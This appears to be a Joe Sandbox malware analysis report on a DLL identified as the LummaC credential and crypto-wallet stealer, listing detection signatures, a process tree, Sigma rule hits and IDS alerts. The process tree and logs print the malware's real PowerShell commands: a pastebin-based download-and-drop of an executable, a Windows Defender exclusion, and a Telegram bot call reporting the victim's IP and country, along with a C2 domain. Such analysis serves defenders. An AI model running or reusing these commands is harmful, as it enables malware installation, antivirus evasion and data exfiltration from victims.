Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SystemCoreHelper.dll

Overview

General Information

Sample name:SystemCoreHelper.dll
Analysis ID:1561436
MD5:319c704031bc817ada8882e1a55b330e
SHA1:30850826f44f8a70659a7b955ca0d06dd158b22a
SHA256:832d09109784aa6d472af5e1e93a40d9987fa9d85859c1f803180ed20eb3ac80
Tags:dlluser-4k95m
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
PE file contains section with special chars
PE file has nameless sections
Powershell drops PE file
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell DownloadFile
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • loaddll32.exe (PID: 2596 cmdline: loaddll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 2756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3384 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 2492 cmdline: rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3120 cmdline: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled MD5: 889B99C52A60DD49227C5E485A016679)
      • csc.exe (PID: 6628 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • conhost.exe (PID: 772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 3488 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES42BA.tmp" "c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • powershell.exe (PID: 3512 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2892 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7516 cmdline: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • zbjnkzvo4cc.exe (PID: 8012 cmdline: "C:\Windows\Temp\zbjnkzvo4cc.exe" MD5: 1D08526FC81B1D62195F4E5DEA52BB6F)
        • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • aspnet_regiis.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe" MD5: 5D1D74198D75640E889F0A577BBF31FC)
        • WerFault.exe (PID: 8180 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 1232 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • powershell.exe (PID: 7680 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7588 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2256 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 5960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rundll32.exe (PID: 7188 cmdline: rundll32.exe "C:\Users\user\Desktop\SystemCoreHelper.dll",GetCompiled MD5: 889B99C52A60DD49227C5E485A016679)
      • csc.exe (PID: 7220 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
        • conhost.exe (PID: 7240 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cvtres.exe (PID: 7320 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4E05.tmp" "c:\Users\user\AppData\Local\Temp\juqgin2j\CSCBFD98E15EAE94B1A9A3E8A6348847C3D.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
      • powershell.exe (PID: 7348 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7664 cmdline: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\mxtvcgq32fe.exe')" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • mxtvcgq32fe.exe (PID: 6656 cmdline: "C:\Windows\Temp\mxtvcgq32fe.exe" MD5: 1D08526FC81B1D62195F4E5DEA52BB6F)
        • conhost.exe (PID: 7312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WerFault.exe (PID: 1196 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6656 -s 1212 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • powershell.exe (PID: 5436 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/ip'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1880 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://ipinfo.io/country'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7748 cmdline: "powershell" -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot8085663235:AAFDx0xXPubGGyduRE6KpbLp4WNE4LTvw-o/sendMessage?chat_id=-1002361597694&text=NEW%20LOGS!%0ABuild%20%3D%3E%20bbs%0AIP%20%3D%3E%208.46.123.75%0ACountry%20%3D%3E%20US'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 url": ["revirepart.biz"]}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\juqgin2j\juqgin2j.0.csJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.csJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        SourceRuleDescriptionAuthorStrings
        Process Memory Space: rundll32.exe PID: 3120JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: csc.exe PID: 6628JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: rundll32.exe PID: 7188JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              Process Memory Space: csc.exe PID: 7220JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                Process Memory Space: powershell.exe PID: 7516JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                  Click to see the 6 entries
                  SourceRuleDescriptionAuthorStrings
                  amsi32_7516.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                    amsi32_7664.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe
                      Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", ProcessId: 6628, ProcessName: csc.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", CommandLine|base64offset|contains: *&, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell" -Command "(New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'); (New-Object System.Net.WebClient).DownloadFile((New-Object System.Net.WebClient).DownloadString('https://pastebin.com/raw/NQfY14gm'), 'C:\Windows\Temp\zbjnkzvo4cc.exe')", ProcessId: 7516, ProcessName: powershell.exe
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 3120, TargetFilename: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Windows\Temp'", ProcessId: 3512, ProcessName: powershell.exe

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: rundll32.exe C:\Users\user\Desktop\SystemCoreHelper.dll,GetCompiled, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 3120, ParentProcessName: rundll32.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.cmdline", ProcessId: 6628, ProcessName: csc.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:25.179692+010020283713Unknown Traffic192.168.2.449741172.67.184.174443TCP
                      2024-11-23T12:47:27.796297+010020283713Unknown Traffic192.168.2.449744104.21.88.250443TCP
                      2024-11-23T12:47:29.882269+010020283713Unknown Traffic192.168.2.449747104.21.88.250443TCP
                      2024-11-23T12:47:32.221521+010020283713Unknown Traffic192.168.2.449748104.21.88.250443TCP
                      2024-11-23T12:47:34.437519+010020283713Unknown Traffic192.168.2.449749104.21.88.250443TCP
                      2024-11-23T12:47:36.720382+010020283713Unknown Traffic192.168.2.449751104.21.88.250443TCP
                      2024-11-23T12:47:39.525155+010020283713Unknown Traffic192.168.2.449752104.21.88.250443TCP
                      2024-11-23T12:47:41.972082+010020283713Unknown Traffic192.168.2.449754104.21.88.250443TCP
                      2024-11-23T12:47:43.665732+010020283713Unknown Traffic192.168.2.449756104.21.88.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:26.072559+010020546531A Network Trojan was detected192.168.2.449741172.67.184.174443TCP
                      2024-11-23T12:47:28.497950+010020546531A Network Trojan was detected192.168.2.449744104.21.88.250443TCP
                      2024-11-23T12:47:30.610883+010020546531A Network Trojan was detected192.168.2.449747104.21.88.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-23T12:47:26.072559+010020498361A Network Trojan was detected192.168.2.449741172.67.184.174443TCP
                      2024-11-23T12:47:28.497950+010020498361A Network Trojan was detected192.168.2.449744104.21.88.250443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
